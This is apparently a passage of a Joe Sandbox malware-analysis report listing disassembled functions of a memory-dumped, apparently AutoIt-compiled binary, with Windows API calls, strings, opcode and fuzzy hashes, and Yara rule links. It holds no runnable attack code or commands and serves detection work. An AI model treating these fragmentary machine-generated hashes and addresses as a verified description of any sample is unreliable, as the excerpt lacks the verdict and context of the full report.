                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message$DispatchPeekTranslate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4217535847-0
                                                                                                                                                          • Opcode ID: e204410f0addb6948118a24e77b316109f5fecb17c9085da62fb00b8e3944ce0
                                                                                                                                                          • Instruction ID: a6baa46a7e5dcb2cbb9b1cd0ffc3507388efb1b87d7ae4297902c16ae6165c31
                                                                                                                                                          • Opcode Fuzzy Hash: e204410f0addb6948118a24e77b316109f5fecb17c9085da62fb00b8e3944ce0
                                                                                                                                                          • Instruction Fuzzy Hash: 6CF01C72604355ABDB60DAE1AD45FABB7DDBB94740F080C2DF646D2180EBB0D4048722
                                                                                                                                                          Function 0013058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: CALL
                                                                                                                                                          • API String ID: 0-4196123274
                                                                                                                                                          • Opcode ID: 1f865346f372ab9c22f452d7947c11c69ce67635c163f23cecca9baf72b59274
                                                                                                                                                          • Instruction ID: f125ba821876b959a0dd8b2ee9868e614277866b85dab7bd7d9d10eaffb87a9c
                                                                                                                                                          • Opcode Fuzzy Hash: 1f865346f372ab9c22f452d7947c11c69ce67635c163f23cecca9baf72b59274
                                                                                                                                                          • Instruction Fuzzy Hash: BC227C70508341DFDB29DF24D4A0A6AB7E1FF98304F15896DE99A8B261D731EC85CF82
                                                                                                                                                          Function 0012131C Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001216F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00121751
                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0012159B
                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00121612
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001958F7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 458326420-0
                                                                                                                                                          • Opcode ID: 2b10d16fffd2aa0e94b844d068992f1a80967c8b66b5842bf7cf8be4c04a7794
                                                                                                                                                          • Instruction ID: 4ed87cdf37c36ad295873f99516e35140586fd9ddf93ce6f01ce50d7850c2f17
                                                                                                                                                          • Opcode Fuzzy Hash: 2b10d16fffd2aa0e94b844d068992f1a80967c8b66b5842bf7cf8be4c04a7794
                                                                                                                                                          • Instruction Fuzzy Hash: 877198B49412C5BAC315DFEAB9D089CBBA5FB69744394412EE00A9BBA2DB7044C4CF11
                                                                                                                                                          Function 00124010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID: EA06
                                                                                                                                                          • API String ID: 4104443479-3962188686
                                                                                                                                                          • Opcode ID: ff6db47ae7eaafffd899e89877be452f81c786f813307d193404c1c33bf8f013
                                                                                                                                                          • Instruction ID: 259f893b62da0e893d196edded81d3e880abd0791a1c2b8860be888916d01ecb
                                                                                                                                                          • Opcode Fuzzy Hash: ff6db47ae7eaafffd899e89877be452f81c786f813307d193404c1c33bf8f013
                                                                                                                                                          • Instruction Fuzzy Hash: 1241AF21A042349BCF158B54EC917FF7FA28F65300F294565FA82EB182C7219DF087A5
                                                                                                                                                          Function 0017013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscmp
                                                                                                                                                          • String ID: 0.0.0.0
                                                                                                                                                          • API String ID: 856254489-3771769585
                                                                                                                                                          • Opcode ID: 6a5022402aab31c6dd039a82d2c3aa524771da780a0aba912e0b202b2825dde7
                                                                                                                                                          • Instruction ID: 77a8e55daf793bcce60185a9b3b690dbafe6b5f413f5602d4a9de94fe896dd15
                                                                                                                                                          • Opcode Fuzzy Hash: 6a5022402aab31c6dd039a82d2c3aa524771da780a0aba912e0b202b2825dde7
                                                                                                                                                          • Instruction Fuzzy Hash: 4A11A335700314DBCB08EB54E991EA9B3B5AF98714B14C059F609AF391EB71ED818BA4
                                                                                                                                                          Function 00123BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00193CF1
                                                                                                                                                            • Part of subcall function 001231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001231DA
                                                                                                                                                            • Part of subcall function 00123A67: SHGetMalloc.SHELL32(00123C31), ref: 00123A7D
                                                                                                                                                            • Part of subcall function 00123A67: SHGetDesktopFolder.SHELL32(?), ref: 00123A8F
                                                                                                                                                            • Part of subcall function 00123A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00123AD2
                                                                                                                                                            • Part of subcall function 00123B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,001E22E8,?), ref: 00123B65
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                                                          • String ID: X
                                                                                                                                                          • API String ID: 2727075218-3081909835
                                                                                                                                                          • Opcode ID: 94276e200ecd59a2be5ce694bf5e5b5fe5ac1faafa57219471e9d1c869f870d4
                                                                                                                                                          • Instruction ID: 140796ac4454f452e1931499da357a4a68239d2bfa433d854d92641b486a38a4
                                                                                                                                                          • Opcode Fuzzy Hash: 94276e200ecd59a2be5ce694bf5e5b5fe5ac1faafa57219471e9d1c869f870d4
                                                                                                                                                          • Instruction Fuzzy Hash: 2F11CA71A00298BBCF05DFD4E8056DE7BF9AF55704F00400AE521BB341DBB84A59CBA1
                                                                                                                                                          Function 001234C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 001934AA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                                          • API String ID: 1029625771-2684727018
                                                                                                                                                          • Opcode ID: 3660f4cc8f077463f166af4561c4614f094a1c3fdd2079ceec3c65f348536674
                                                                                                                                                          • Instruction ID: a98f59092d6c9d01c23ce6e5aa46dd8307c1ad3f1a38d45ab1106fd0032c527f
                                                                                                                                                          • Opcode Fuzzy Hash: 3660f4cc8f077463f166af4561c4614f094a1c3fdd2079ceec3c65f348536674
                                                                                                                                                          • Instruction Fuzzy Hash: 4EF06871D0421DAECF15FFB0EC518FFB7B8AA20310B118526F83592081EB389B19CB21
                                                                                                                                                          Function 0013F461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6c6fe722f034e30692c80e3a509a5e314d1c7e5602d3e4a6df0d45671e02a012
                                                                                                                                                          • Instruction ID: 0a2c6091ccf508627bddd34cf786f83bee87aeb4f741a7a3c19b06d203b4b07f
                                                                                                                                                          • Opcode Fuzzy Hash: 6c6fe722f034e30692c80e3a509a5e314d1c7e5602d3e4a6df0d45671e02a012
                                                                                                                                                          • Instruction Fuzzy Hash: 3151C4316043019FCB14EF68D491BAE73E5AF98314F14856DF99A8B292DB30ED45CBA1
                                                                                                                                                          Function 0016AE06 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4104443479-0
                                                                                                                                                          • Opcode ID: f97e633b72716803f5f0b76eddd80c7566a91edd33d5e4c11a30fcab99a95b12
                                                                                                                                                          • Instruction ID: e1638f94eb0626337f1e29b3c670fb9d43818d26175c69e20ee37cb3b4862977
                                                                                                                                                          • Opcode Fuzzy Hash: f97e633b72716803f5f0b76eddd80c7566a91edd33d5e4c11a30fcab99a95b12
                                                                                                                                                          • Instruction Fuzzy Hash: ED31C2B1A002049FD700EFA8DC819AEB7F8FF59700F648459E285A7292DB75DC158B62
                                                                                                                                                          Function 00178065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00178074
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0017807A
                                                                                                                                                            • Part of subcall function 00176B19: GetWindowRect.USER32(?,?), ref: 00176B2C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$CursorForegroundRect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1066937146-0
                                                                                                                                                          • Opcode ID: 27a4209e52d7825b3aa5a60f139c668bf4ca6744287e29468ff478f4314ab0c4
                                                                                                                                                          • Instruction ID: 91303816122e789b6a895067a9fe2bcb0df7e774f6311b68a07bef4d2bdc2b05
                                                                                                                                                          • Opcode Fuzzy Hash: 27a4209e52d7825b3aa5a60f139c668bf4ca6744287e29468ff478f4314ab0c4
                                                                                                                                                          • Instruction Fuzzy Hash: 12313275A00218AFDB00EFA4DC85AEEB7B4FF18314F508429E956A7251DB34AE55CB90
                                                                                                                                                          Function 00121DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • IsWindow.USER32(00000000), ref: 0019DB31
                                                                                                                                                          • IsWindow.USER32(00000000), ref: 0019DB6B
                                                                                                                                                            • Part of subcall function 00121F04: GetForegroundWindow.USER32 ref: 00121FBE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Foreground
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 62970417-0
                                                                                                                                                          • Opcode ID: da68cc62c7bbcd99fa6b03d432f980ff8bd8e4afd4aaf24cb7e6d7e2a329f65b
                                                                                                                                                          • Instruction ID: 058a8249695cba238bf9b92a9ff4c25d1ef7d143030d16cde3671ba6d37b3834
                                                                                                                                                          • Opcode Fuzzy Hash: da68cc62c7bbcd99fa6b03d432f980ff8bd8e4afd4aaf24cb7e6d7e2a329f65b
                                                                                                                                                          • Instruction Fuzzy Hash: 9021DF72600216BBDB25AF74EC81BFEB7A99FA1384F110429F95BC7141EB34EE119760
                                                                                                                                                          Function 0015E2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00121952
                                                                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0015E344
                                                                                                                                                          • _strlen.LIBCMT ref: 0015E34F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
